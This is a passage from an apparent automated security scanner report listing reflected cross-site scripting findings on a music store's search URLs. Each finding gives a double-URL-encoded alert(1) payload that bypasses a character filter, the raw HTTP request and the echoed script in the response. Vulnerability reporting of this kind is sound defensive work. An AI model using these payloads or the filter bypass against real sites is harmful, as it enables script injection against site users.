Set-Cookie: CFID=362539891; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=117876669; expires=Sun, 09-Jan-2011 02:40:01 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cardia67e5f</title><script>alert(1)</script>57b4b955292</title>
...[SNIP]...

1.108. http://www.insound.com/search/query/Cardia&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cardia&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2822d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead1080e859e was submitted in the REST URL parameter 3. This input was echoed as 2822d"><script>alert(1)</script>ad1080e859e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cardia2822d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead1080e859e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=lst2p8d8rnqn1djht20qf55957; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=148217325; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=259421859; expires=Sun, 09-Jan-2011 02:39:56 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cardia2822d"><script>alert(1)</script>ad1080e859e" />
...[SNIP]...

1.109. http://www.insound.com/search/query/Carissa's%20Wierd&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carissa's%20Wierd&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ca7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6431cf88b5a was submitted in the REST URL parameter 3. This input was echoed as d4ca7"><script>alert(1)</script>6431cf88b5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carissa's%20Wierdd4ca7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6431cf88b5a&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=93jamcqg3tl6c20fjmfsebkok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=262737656; expires=Sun, 09-Jan-2011 02:40:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=106756444; expires=Sun, 09-Jan-2011 02:40:12 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Carissa's Wierdd4ca7"><script>alert(1)</script>6431cf88b5a" />
...[SNIP]...

1.110. http://www.insound.com/search/query/Carissa's%20Wierd&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Carissa's%20Wierd&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f4864%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2b5185e950 was submitted in the REST URL parameter 3. This input was echoed as f4864</title><script>alert(1)</script>b2b5185e950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Carissa's%20Wierdf4864%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb2b5185e950&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tgols79kuj4a014n0if3h9j2m7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=161967005; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=114845230; expires=Sun, 09-Jan-2011 02:40:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Carissa's Wierdf4864</title><script>alert(1)</script>b2b5185e950</title>
...[SNIP]...

1.111. http://www.insound.com/search/query/Cassie&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cassie&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fdd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7d46d9c1 was submitted in the REST URL parameter 3. This input was echoed as c1fdd"><script>alert(1)</script>d7d46d9c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cassiec1fdd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed7d46d9c1&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=agrceq520jknf26gmuk71d5236; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=151918547; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=112073596; expires=Sun, 09-Jan-2011 02:40:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cassiec1fdd"><script>alert(1)</script>d7d46d9c1" />
...[SNIP]...

1.112. http://www.insound.com/search/query/Cassie&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cassie&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b73ef%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2fb05f808 was submitted in the REST URL parameter 3. This input was echoed as b73ef</title><script>alert(1)</script>e2fb05f808 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cassieb73ef%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2fb05f808&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=h66osqkllcnmdrmldgd3lo9243; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=349904803; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=18646576; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cassieb73ef</title><script>alert(1)</script>e2fb05f808</title>
...[SNIP]...

1.113. http://www.insound.com/search/query/Curren$y&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Curren$y&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 62953%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0126adc5a5e was submitted in the REST URL parameter 3. This input was echoed as 62953</title><script>alert(1)</script>0126adc5a5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Curren$y62953%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0126adc5a5e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=iq9mlpk0f9j9d3nbon0jd2got5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=7798718; expires=Sun, 09-Jan-2011 02:40:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=472738894; expires=Sun, 09-Jan-2011 02:40:09 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Curren$y62953</title><script>alert(1)</script>0126adc5a5e</title>
...[SNIP]...

1.114. http://www.insound.com/search/query/Curren$y&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Curren$y&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccac5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8e0ea4401f was submitted in the REST URL parameter 3. This input was echoed as ccac5"><script>alert(1)</script>c8e0ea4401f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Curren$yccac5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec8e0ea4401f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=n501ndjo7k6n5uqou6g9hrhqp3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=462755530; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=184402737; expires=Sun, 09-Jan-2011 02:40:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Curren$yccac5"><script>alert(1)</script>c8e0ea4401f" />
...[SNIP]...

1.115. http://www.insound.com/search/query/D'eon&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/D'eon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44e45114f50 was submitted in the REST URL parameter 3. This input was echoed as c4055"><script>alert(1)</script>44e45114f50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/D'eonc4055%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44e45114f50&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=g08betfo219as5t0embcje8923; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=102697205; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=79255942; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="D'eonc4055"><script>alert(1)</script>44e45114f50" />
...[SNIP]...

1.116. http://www.insound.com/search/query/D'eon&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/D'eon&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 61f59%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2dd9703b6fa was submitted in the REST URL parameter 3. This input was echoed as 61f59</title><script>alert(1)</script>2dd9703b6fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/D'eon61f59%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2dd9703b6fa&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=t06k1164vsvnb3okqc7bm9a757; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=261380389; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=445672352; expires=Sun, 09-Jan-2011 02:41:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>D'eon61f59</title><script>alert(1)</script>2dd9703b6fa</title>
...[SNIP]...

1.117. http://www.insound.com/search/query/DJ%20/rupture&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/DJ%20/rupture&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21167%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b0cb5ca909 was submitted in the REST URL parameter 3. This input was echoed as 21167"><script>alert(1)</script>3b0cb5ca909 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/DJ%2021167%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3b0cb5ca909/rupture&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=63eb2n7ddlgu01kv4phcp0ml15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: CFID=392918233; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=134911883; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="DJ 21167"><script>alert(1)</script>3b0cb5ca909" />
...[SNIP]...

1.118. http://www.insound.com/search/query/DJ%20/rupture&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/DJ%20/rupture&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload a4f2d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eca96ee754fd was submitted in the REST URL parameter 3. This input was echoed as a4f2d</title><script>alert(1)</script>ca96ee754fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/DJ%20a4f2d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eca96ee754fd/rupture&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vm6esvvn005qqntp64ba70jlk2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: CFID=208387021; expires=Sun, 09-Jan-2011 02:37:41 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=267241704; expires=Sun, 09-Jan-2011 02:37:41 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>DJ a4f2d</title><script>alert(1)</script>ca96ee754fd</title>
...[SNIP]...

1.119. http://www.insound.com/search/query/Daft%20Punk&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Daft%20Punk&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d1e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e256a07ce2f9 was submitted in the REST URL parameter 3. This input was echoed as 33d1e"><script>alert(1)</script>256a07ce2f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Daft%20Punk33d1e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e256a07ce2f9&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7m0m0a5egokkmesqo7qavb3m14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
